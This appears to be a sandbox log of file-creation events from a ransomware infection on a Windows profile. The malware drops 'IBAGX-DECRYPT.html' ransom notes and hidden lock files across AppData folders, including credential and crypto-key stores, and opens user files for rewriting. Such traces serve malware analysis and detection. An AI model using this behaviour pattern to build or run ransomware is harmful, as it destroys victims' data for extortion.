Create C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\AddIns\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\AddIns\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\XLSTART\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\XLSTART\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IME12\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IME12\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP12\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP12\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP8_1\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP8_1\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP9_0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP9_0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\05P2C0FB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\05P2C0FB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\SFX4RKM5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\SFX4RKM5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\T9DX4T6Q\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\T9DX4T6Q\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\PB5UWKXI\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\PB5UWKXI\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\TIIZUCFY\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\TIIZUCFY\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\ZQH8NGYD\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\ZQH8NGYD\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MMC\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MMC\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\PowerPoint\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\PowerPoint\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
